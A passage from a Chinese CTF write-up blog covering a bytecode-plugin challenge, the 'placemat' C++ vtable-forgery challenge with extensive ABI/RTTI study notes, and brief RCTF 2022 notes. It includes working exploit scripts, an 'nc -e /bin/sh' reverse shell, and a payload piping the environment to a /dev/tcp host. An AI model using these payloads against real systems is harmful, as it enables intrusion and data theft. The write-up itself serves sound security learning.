    bc = get_plugin_code(i+msg_idx, func_idx, fn_idx, raw_idx)
    store(b'../plugins/%d' % i, bc)
dump()

exp_bc = exp_bc.ljust(num_chunks*chunk_size, b';')
exp_block = []
for i in range(0, len(exp_bc), chunk_size):
    exp_block.append(exp_bc[i:i+chunk_size])
    upload_key(exp_block[-1])
print('exp_block:')
print(exp_block)

#fn_idx
upload_key(b'plugins/expl')

#exec plugins to store exp to plugins/expl
for i in range(6):
    plugin(f'../plugins/{i}'.encode())

ip = '127.0.0.1'
rev_port = 5555
commmand = f"nc {ip} {rev_port} -e /bin/sh".ljust(chunk_size * 3, " ")
upload_key(commmand[:chunk_size])
upload_key(commmand[chunk_size : 2 * chunk_size])
upload_key(commmand[2 * chunk_size :])

# rev_shl = listen(rev_port)
plugin(f'expl'.ljust(12, ' ').encode())
# rev_shl.sendline(b'echo $flag')
# flag = rev_shl.recvline(False)
# log.success(flag)
其实还是复杂了

writeup3

这篇wp使用的方法是用eval()来解析反弹shell命令, 而从consts加载的命令字符串可直接使用BINARY_ADD指令来拼接(当然BUILD_STRING感觉更好). 在exp_bc后面加上了return语句, (应该)可以避免unknown opcode的报错.

并没有把多个写入操作分成多个文件, 而是

from ptrlib import *
import time
import os
def make_conn():
    return Socket("localhost", 4444)
    #return Socket("23.88.100.81", 44463)
def store(entry, data):
    assert len(entry) <= 12
    assert len(data) < 0x80
    sock = make_conn()
    sock.send('S')
    sock.send(entry + b'\x00' * (12 - len(entry)))
    sock.send(bytes([len(data) * 2]))
    sock.send(data.hex())
    print(sock.recvline())
    sock.close()
def dump():
    sock = make_conn()
    sock.send('D')
    print(sock.recv())
    sock.close()
def plugin(name):
    sock = make_conn()
    sock.send('P')
    sock.send(name + b'\x00' * (12 - len(name)))
    sock.close()
# '/' is not valid as filename so use \x2f instead
pycode = b"__import__('os').system('bash -c \"env > \\x2fdev\\x2ftcp\\x2f<HOST>\\x2f<PORT>\"')"
pychunks = chunks(pycode, 12, b'\n')
code = bytes([
    116,0x00, # LOAD_GLOBAL (eval)
])
for i in range(len(pychunks)):
    code += bytes([100,i])  # LOAD_CONST
    if i > 0:
        code += bytes([0x17,0x00]) # BINARY_ADD
code += bytes([
    0x09,0xc2,  # NOP
    0x83,0x01, # LOAD_METHOD (eval) 这是什么东西, 明明是CALL_FUNCTION
    0x01,0x00, # POP_TOP
    100,0x00, # LOAD_CONST (None)
    83,0x00, # RETURN_VALUE
])
data = code + b";eval;"
blocks = chunks(data, 12, b'\x00')
pos_func = 0x33 + len(blocks)
code = b""
for i in range(len(blocks)):
    code += bytes([
        100,pos_func, 100,0x30, 100,0x30, 100,0x30, # func
        100,0x30, 100,0x32, 100,0x33+i, # raw, filename, msg
        49, 0x30, # call by exception
    ])
code += bytes([53,53])
for piece in pychunks:
    store(piece, b"whatever")
for i in range(0x30 - len(pychunks)):
    store(bytes([0x41 + i] * 12), b"whatever")
store(b"../plugins/A", bytes.fromhex(code.decode()))
store(b"\x00", b"whatever") # stop
store(b".//plugins/B", b"whatever") # filename
for block in blocks:
    store(block, b"whatever") # data
# write ascii bytecode
dump()
time.sleep(0.1)
plugin(b"0123456789/A")
# win!
time.sleep(0.1)
plugin(b"0123456789/B")

RIOT

RIOT src off-by-one

placemat

  • 看到一个meson.build文件, 才知道这是一个和cmake同类型的build scripts generation. Wiki在此

居然是32位程序, 除了PIE其他都开了.

woc为什么在ubuntu上运行不了?? 2.34用allinone装上之后都没有了符号链接, 这能用??? 在ubuntu2004 22204里运行都给我说no such file or directory. 差不多得了.

搞不定这个环境. 理解不能, 这c++的库都是用的啥? glibc不能直接用吧. 果然还是放弃这种比赛题比较实际, 大半天啥也没试出来. 又被crazyman叫来看看, 我…还是试试从源码编译吧…

  • 学了两下meson: meson setup [build directory] cd [build directory] && meson compile
    • 每个build directory都有各自的配置, 分成一个个文件夹便于测试.
    • meson compile == ninja, 因为meson的默认backend是ninja.
  • 发现缺失bits/c++config.h, 然后准备安装g++-multilib, 然后又发现kali里的libc6-dev版本过低导致依赖的libglib2.0-dev也较低, 结果是libglib2.0-dev无法安装更新版本. 执行pc apt --only-upgrade install libc6-dev后解决. 最终执行
    apt install g++-multilib.

怎么调试C++里面的类和一些变量布局我还得熟悉下.

  • 看了看C++17的optional. post 就像是刚刚看的rust里的Option<T>.
  • 额还得看看c++编译器是怎么实现class的. 找个文章.

可能有的问题:

  • Human::requestName中scanf("%s", this->name);没有限制长度. 鬼知道溢出到了什么地方. 好了现在知道了.
  • 还有个strcpy有个非常没用的栈溢出.
  • flag的获取必须是赢过bot.

然后队里别人先做出来了(不出所料), 是伪造虚表然后装成bot, 自己赢过自己获取flag. 我先调试看看c++的class怎么布局的.

  • 首先研究构造函数, 发现Human human声明语句即构造函数调用语句, 参数为栈上指针, 大小为ebp-0x20的位置, 这个就是this指针. 然后继续调用父类构造清空name成员, name成员由this来定位. 不过name不是this指向的空间, 前四字节是用来标识子类的一串数字(也许有什么特殊含义). 好吧原来是虚表地址, 对象的虚表指针用来指向自己所属类的虚表,虚表中的指针会指向其继承的最近的一个类的虚函数. 地址到IDA里看看更多信息.
  • Player这个基类的两个函数加析构都是虚函数, 但是析构没有定义, 所以在虚表里面是NULL.
  • 超出作用域的class直接调用析构函数, 如局部class在函数末尾的析构.
  • 注意到文件里除了vtable for Bot之类的还有
  • 果然还是ABI标准更全面一些. 省的自己在这儿乱研究. 标准真的太长了. stackoverflow

继续研究:

  • 在startSingleplayer()函数栈帧里存储有两个玩家的object, 以虚指针开头总共4(vptr)+20(name)=24=0x18字节, 初始name被填满空字符, 输入玩家名称时可以填满20字节达到leak之后的数据的目的. scanf会加空字符, 必须修改后才能leak.
  • human是栈上靠近栈底的变量, 在[ebp-0x20]的位置, 0xc(12)处还有个canary, 栈底八字节没啥用处
  • takeTurn中又是%s, 输出长度没有限制.

重大发现, 这个程序是32位的, 所以要用32位库. 真是好一个重大发现, 难怪patchelf和ubuntu2204(默认没有32位运行环境)都不行. 好的下了debian32位2.35libc成功了.

绝了, 自己编译的做不出来, 但是源文件是可以的, 因为两个class离canary有更大的距离, 因为Game class放到了两个Player class的后面, 而Game前几个成员变量是player opponent之类的, 可以解决scanf默认添加的空字符问题. emmmm这样究竟是怎么出题的, 是巧合还是能控制变量在栈上的位置? 但是源文件调试是真的不爽, 什么符号都没有. 难不成要ida修复符号然后远程调试? 想想都麻烦. 而且有些输入不是我能打出来的. 还是pwntools吧.

  • 我是不明白为什么random::bit会一直只选第一个玩家, 完全没有随机性可言. 但是自己编译的程序就可以. (???) 只是我运气好罢了. 居然是下面这个问题的原因.
  • 为什么都定义了%20s了但是在printPlayerNames还是会打印出超过20个字符???什么魔法啊这是.
    我又知道了, 原来scanf和printf也是不一样的. printf("%20s", buf);限制的只是对齐宽度, 如果字符串更长就会忽略这个对齐. %20s用在scanf里才是限制输入的string, 然而在printf里如果要限制输出长度则要用%.20s, 或者是在参数中提供长度%.*s(还可以是某个位置的参数, 具体见printf手册)(左对齐是%-20s)
  • 在congratulate中看到typeid宏, 对一个多态对象求类型id. 实质上是??? 只查到是查个虚表, 待我看看汇编. 看到了c++ abi, 然而内容太多我抓不住重点. 又找了一个series blog. 真的太多了, 但我真的想看懂ABI.
    不如Stack Overflow里的清楚 还是有例子的好些, 一堆文字真的很难看懂.

c++ abi (vtables & RTTI)

  • _ZTV is a prefix for vtable, _ZTS is a prefix for type-string (name) and _ZTI is for type-info.

  • 重要的概念

    • primary base class: For a dynamic class, the unique base class (if any) with which it shares the virtual pointer at offset 0.
    • proper base class: 继承树中一个类的所有父类
    • secondary virtual table: The instance of a virtual table for a base class that is embedded in the virtual table of a class derived from it.
    • The primary virtual table can be viewed as two virtual tables accessed from a shared virtual table pointer.
    • virtual table group: The primary virtual table for a class along with all of the associated secondary virtual tables for its proper base classes.
  • vtable components

    • Virtual Base (vbase) offsets are used to access the virtual bases of an object.
    • The offset to top holds the displacement to the top of the object from the location within the object of the virtual table pointer that addresses this virtual table
    • The typeinfo pointer points to the typeinfo object used for RTTI
    • The virtual table address point points here
    • Virtual function pointers. Each pointer holds either the address of a virtual function of the class, or the address of a secondary entry point that performs certain adjustments before transferring control to a virtual function.
  • vtable construction 详细讲了proper base class在各种情况下应该怎样构建vtable.

    • 比如
      No inherited virtual functions
      No virtual base classes
      Declares virtual functions时, vtable就是简单的offset-to-top & RTTI fields & virtual function pointers
  • The elements of the VTT array for a class D:
    which is declared for each class type that has indirect or direct virtual base classes.

    • Primary virtual pointer
      address of the primary virtual table for the complete object D.
    • Secondary VTTs
      for each direct non-virtual proper base class B of D that requires a VTT, in declaration order, a sub-VTT for B-in-D, structured like the main VTT for B, with a primary virtual pointer, secondary VTTs, and secondary virtual pointers, but without virtual VTTs.

      NOTE: This construction is applied recursively.

    • Secondary virtual pointers
      for each base class X which (a) has virtual bases or is reachable along a virtual path from D, and (b) is not a non-virtual primary base, the address of the virtual table for X-in-D or an appropriate construction virtual table.

      X is reachable along a virtual path from D if there exists a path X, B1, B2, …, BN, D in the inheritance graph such that at least one of X, B1, B2, …, or BN is a virtual base class.

      The order in which the virtual pointers appear in the VTT is inheritance graph preorder.

      NOTE: There are virtual pointers for direct and indirect base classes. Although primary non-virtual bases do not get secondary virtual pointers, they do not otherwise affect the ordering.

      Primary virtual bases require a secondary virtual pointer in the VTT because the derived class with which they will share a virtual pointer is determined by the most derived class in the hierarchy.

      Secondary virtual pointers may be required for base classes that do not require secondary VTTs. A virtual base with no virtual bases of its own does not require a VTT, but does require a virtual pointer entry in the VTT.

    • Virtual VTTs
      For each proper virtual base classes in inheritance graph preorder, construct a sub-VTT as in (2) above.

      NOTE: The virtual VTT addresses come last because they are only passed to the virtual base class constructors for the complete object.

  • 单继承

    • 子类虚表如下, 注意子类内存中虚表指针指向下表第三项. 即跳过前两项.
    AddressValueMeaning
    0x400b400x0top_offset (more on this later)
    0x400b480x400b90Pointer to typeinfo for Derived (also part of the above memory dump)
    0x400b500x400a80Pointer to Derived::Foo()3. Derived’s _vptr points here.
    0x400b580x400a90Pointer to Parent::FooNotOverridden() (same as Parent’s)
  • 多继承

    • 多继承时最下层的子类的内存中有多个指针, 如下表所示. 为什么内存中还有两个vptr? 因为child可能被转换为Father*或者Mother*类型的指针当做参数传递, 此时接收参数的函数不需要知道child的存在也能够访问下面内存布局中的Father部分. data显然在要其中, 而Father的虚表指针自然也会在这里, 指向child vtable以提供虚函数的信息.
    _vptr$Mother
    mother_data (+ padding)(这是什么padding??)
    _vptr$Father = non-virtual thunk to Child::FatherFoo(void)
    father_data
    child_data1
    • 值得注意的是现在child vtable里实际上装下了两个table. 如下vtable的第二部分.
    ; `vtable for'Child
    _ZTV5Child       dq 0                    ; offset to this
                     dq offset _ZTI5Child    ; `typeinfo for'Child
    off_555555557D48 dq offset _ZN6Mother9MotherFooEv
                                            ; DATA XREF: main+8↑o
                                            ; Mother::MotherFoo(void)
                     dq offset _ZN5Child9FatherFooEv ; Child::FatherFoo(void)
                     dq -8                   ; offset to this
                     dq offset _ZTI5Child    ; `typeinfo for'Child
    off_555555557D68 dq offset _ZThn8_N5Child9FatherFooEv
    									 ; `non-virtual thunk to'Child::FatherFoo(void)
    
  • 但是, 当子类继承父类时重载了父类函数, 为了要使 利用多态将child* this的指针转换为father* this然后ptr->FatherFoo()的函数能够执行child::FatherFoo(), 编译器会识别到重载的存在, 并生成上表的child class结构, 并且生成一个thunk代码片段代替Father::Foo()来调整this指针使得其变成child的class ptr. 其中_vptr$Father指向的secondary virtual table中会是这个thunk的地址.

    .text:0000555555555227 ; __int64 __fastcall `non-virtual thunk to'Child::FatherFoo(Child *__hidden this)
    .text:0000555555555227                 public _ZThn8_N5Child9FatherFooEv
    .text:0000555555555227 _ZThn8_N5Child9FatherFooEv proc near
    .text:0000555555555227                 sub     rdi, 8          ; this
    .text:000055555555522B                 jmp     short _ZN5Child9FatherFooEv ; Child::FatherFoo(void)
    .text:000055555555522B _ZThn8_N5Child9FatherFooEv endp
    
    • vtable中top_offset即为-8的那一行, 看起来只是提供一个信息提示, 指child内存中Father部分到内存top的距离.
      thunk代码中直接使用sub rdi, 8并未引用该处数据.
  • 三重多继承, 虚继承Grandparent class.

    • 新东西: construction vtable for Parent1-in-Child VTT for Child virtual-base offset
    • virtual-base offset是针对Child::Child()中Patent1初始化时要访问Grandpatent数据时, this指针(此时指向Child内存中Parent1部分, 也就是Child开头)到child内存中Grandpatent部分的偏移量.
    • IDA中construction vtable for Patent1-in-Childvtable for Parent基本重叠, 除了前者开头的virtual-base offset在后者上方.
    ; `construction vtable for' Parent1-in-Child
    	_ZTC5Child0_7Parent1 dq 20h 	; that is virtual-base offset
    ; `vtable for' Parent1
    	...
    
    • VTT
    AddressValueSymbolMeaning
    0x4009a00x400950vtable for Child + 24Parent1’s entries in Child’s vtable
    0x4009a80x4009f8construction vtable for Parent1-in-Child + 24Parent1’s methods in Parent1-in-Child
    0x4009b00x400a18construction vtable for Parent1-in-Child + 56Grandparent's methods for Parent1-in-Child
    0x4009b80x400a98construction vtable for Parent2-in-Child + 24Parent2's methods in Parent2-in-Child
    0x4009c00x400ab8construction vtable for Parent2-in-Child + 56`Grandparent’s methods for Parent2-in-Child
    0x4009c80x400998vtable for Child + 96`Grandparent’s entries in Child’s vtable
    0x4009d00x400978vtable for Child + 64`Parent2’s entries in Child’s vtable

    为什么会有VTT? 来看看child的初始化就明白了:

    • 首先Grandparent construction, 初始化vtable指针指向primary vtable.
    • 然后Parent1初始化Child内存中的vtable ptr为VTT中Parent1-in-Child值(也就是vtable for Parent1),
      再修改GrandParent vtable指针指向其vtable中的Grandparent部分. 关键在于Parent1如何知道其子类Child内存中Grandparent和他自身的距离? 方法就是传入了VTT地址, 两个Parent1-in-Child指针指示了对应的construction table和该table中的vbase offset.
      • 其实这种情况下只传一个指针也是足够的, 但是当parent也有多个基类时就不得不使用VTT了, 很明显需要访问其多个基类的secondary vtable中的vbase offset来确定多个基类的vtable指针值(都在Child内存中).
    • 然后Parent2继续初始化并且又修改了Grandparent的vtable指针.
    • 因为基类的构造不应假设是其子类调用的构造函数, 所以最后Child把所有vtable指针值改向了Child vtable中的几个父类部分.

    如果情况变成

  • “in-charge” and “not-in-charge” constructor and destructor: stackoverflow解释

    构造函数可以不一样: 还是上面的例子, 如果出现了Child的定义, 但是还出现了Parent的定义, 就会有两个Parent构造函数,一个只用在Child::Child()中, 另一个用在Parent自身的构造之中. 也是所谓的in or not in charge constructor

    • An “in-charge” (or complete object) constructor is one that constructs virtual bases,
      and a “not-in-charge” (or base object) constructor is one that does not.
    • 嗯, 不想看了. 还有一些destructor的东西.
  • 多重继承时vtable最后的是VTT, 也就是vtable的table.

RTTI

  • The typeid operator produces a reference to a std::type_info structure with the following public interface
  namespace std {
    class type_info {
      public:
	virtual ~type_info();
	bool operator==(const type_info &) const;
	bool operator!=(const type_info &) const;
	bool before(const type_info &) const;
	const char* name() const;
      private:
	type_info (const type_info& rhs);
	type_info& operator= (const type_info& rhs);
    };
  }
  • 除了指向不完全类型的直接或间接指针外,相等和不等操作符在操作type_info对象时可以写成地址比较:两个type_info结构体当且仅当它们是相同的结构体(在相同的地址)时,它们描述的是相同的类型。
  • layout
    • abi::__class_type_info is used for class types having no bases, and is also a base type for the other two class type representations.
    • 不看了.

真的会累死. 回过头来一看typeid也就是这么点东西:

char __cdecl std::type_info::operator==(std::type_info *a1, std::type_info *a2)
{
  const char *v3; // eax

  if ( (unsigned __int8)std::__is_constant_evaluated() )
    return a1 == a2;
  if ( *((_DWORD *)a1 + 1) == *((_DWORD *)a2 + 1) )
    return 1;
  if ( **((_BYTE **)a1 + 1) == 42 )
    return 0;
  v3 = (const char *)std::type_info::name(a2);
  return !strcmp(*((const char **)a1 + 1), v3);
}

第二个if直接比较的是demangled name. 但是简单的修改指针为Bot虚表会导致执行Bot::taketurn对象函数. 所以我们需要伪造整个虚表,就在栈上, 所以才需要leak栈指针. 这个修改发生在第二局, 此时进入的是Game::Multiplayer(), 就算破坏canary也没有关系, 能够在Game::play()函数里执行congratulate就可以了.

嗯, 需不需要四字节对齐? 好吧栈上的东西已经是对齐的了, 只要从name开头就可以.

.rodata:0804C35C                 dd 0                    ; offset to this
.rodata:0804C360                 dd offset _ZTI5Human    ; `typeinfo for'Human
.rodata:0804C364 off_804C364     dd offset _ZN5HumanD2Ev ; DATA XREF: Human::Human(void)+15↑o
.rodata:0804C364                                         ; Human::~Human()+6↑o
.rodata:0804C364                                         ; Human::~Human()
.rodata:0804C368                 dd offset sub_804AEF2
.rodata:0804C36C                 dd offset requestName
.rodata:0804C370                 dd offset Human__takeTurn

.rodata:0804C1D4 ; `typeinfo for'Bot
.rodata:0804C1D4 _ZTI3Bot        dd offset unk_804EEC8   ; DATA XREF: sub_804AA96+8C↑o
.rodata:0804C1D4                                         ; .rodata:0804C1A8↑o
.rodata:0804C1D8                 dd offset a3bot         ; "3Bot"
.rodata:0804C1DC                 dd offset off_804C1E8

伪造成上面这个样子, 除了typeinfo部分要换成Bot的typeinfo地址.

pl1 = flat([b'yog'.ljust(20, b'\x00'), p2_name_addr])
pl2 = flat([0, 0x804C1D4, 0x804AED0, 0x804AEF2, 0x804AF18, 0x804AF4E])

注意Game class没有虚表指针, 不要看多了就看什么都是虚表.

好吧这样不行, 忽略了后面紧跟着的Game. 会被覆盖.

exp:

from pwn import *
context.log_level = 'debug'
context.binary = './placemat'
p = process("./placemat")
ss=lambda x:p.send(x)       #send string
sl=lambda x:p.sendline(x)
ru=lambda x:p.recvuntil(x)
rl=lambda :p.recvline()
ra=lambda :p.recv()         #recv one
rn=lambda x:p.recv(x)       #recv n
sa=lambda x,y:p.sendafter(x,y)
sla=lambda x,y:p.sendlineafter(x,y)
itt=lambda :p.interactive()

ru(b"3 Exit\n")
sl(b"1")
ru(b"(h)uman? ")
sl(b"h")
ru(b"Player 1: ")
sl(b"yog")
ru(b"Player 2: ")
sl(b"b" * 20)
ru(b"b" * 20)
stack_addr = u32(p.recv(4))
p2_name_addr = stack_addr + 0x18 + 0x8

log.success(f'leak value: 0x{stack_addr:x}')
ru(b"(e.g. A3): ")
sl(b"A1")
ru(b"(e.g. A3): ")
sl(b"B1")
ru(b"(e.g. A3): ")
sl(b"A2")
ru(b"(e.g. A3): ")
sl(b"B2")
ru(b"(e.g. A3): ")
sl(b"A3")

pl1 = flat([b'yog'.ljust(20, b'\x00'), p2_name_addr+20+48+4])
# 一串\x00就是为了跳过Game class的内存. 
pl2 = flat([b'fake_bot', b'\x00'*(20+48-8), 0, 0x804C1D4, 0x804AED0, 0x804AEF2, 0x804AF4E, 0x804AF4E])

ru(b"3 Exit\n")
sl(b"1")
ru(b"(h)uman? ")
sl(b"h")
ru(b"Player 1: ")
sl(pl1)
#gdb.attach(p)
#gdb.attach(p, 'b *0x804AA96\nc')
#input('wait for gdb')
ru(b"Player 2: ")
sl(pl2)

sl(b"A1")
sl(b"B1")
sl(b"A2")
sl(b"B2")
sl(b"A3")

itt()

这个exp的问题是由于先手是随机的但是并未检测先手, 导致一半概率达不到想要的结果. 多试两次或者再写个大循环catch exception.

RCTF 2022

MyCarShowSpeed

  • New a Game

    • stability, performance. 真看不出来漏洞…
  • Show Information

  • Visit The Store

    • Buy Goods:

      • SuperTire没有一点效果. 但是这有什么特别的含义呢.
      • 有钱买flag之后但是wintimes过少会触发没收车辆. 有什么特别的地方?

      **还真有特别的地方, 回过头来看很明显可以先fix car从carlist上删除该车之后(共拥有两辆车以上), 再来买flag, 直接把剩下的也删掉了, carNum归零. **

      • 没看出来…
    • Sell Goods:

      • 在链表上直接把指针置空当做是删除了车辆. 并没有删除节点.
    • Fix Cars

          car->fixTime = time(NULL);
          car->fixed = 1;
          _this->carList->addCar(car, _this->carList);
          _this->carList->carNums++;
          if(carList->carNums > 1)
          {
              car->isTaken = 1;
              carList->deleteCar(car, &carList);
              carList->carNums--;
              puts("OK! We will temporily take your car and fix it soon!");
              return;
          }
          puts("OK! We'll soon fix it!");
      

      所有的车大于一辆时就会从车库中(carList)删除这辆车. 而不仅仅是fixed变成1.

    • Fetch Cars

      • 整数溢出错误
            fixDifficulty = car->fixDifficulty;
            fixedTime = fixDifficulty * time(0LL) - car->fixTime;
            cost = (int)(0.1 * (double)(int)fixedTime) + 5;
      

      可以看出time()返回的巨大时间戳值乘以fixDifficulty后会溢出, 而结果使用int类型, 造成溢出为负数. 测了下只要第二次就可以.

    1. Leave
  • Switch Cars

  • Rules

  1. Quit

???鉴定为烂, 源码和源文件都和目标文件行为到处都不一样, 被整晕了, 不做了. 本质是tcache利用.

Diary

C++逆向. 看到了std::string和std::map的逆向代码. 如果要看懂应该要找找stl的逆向教程.

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值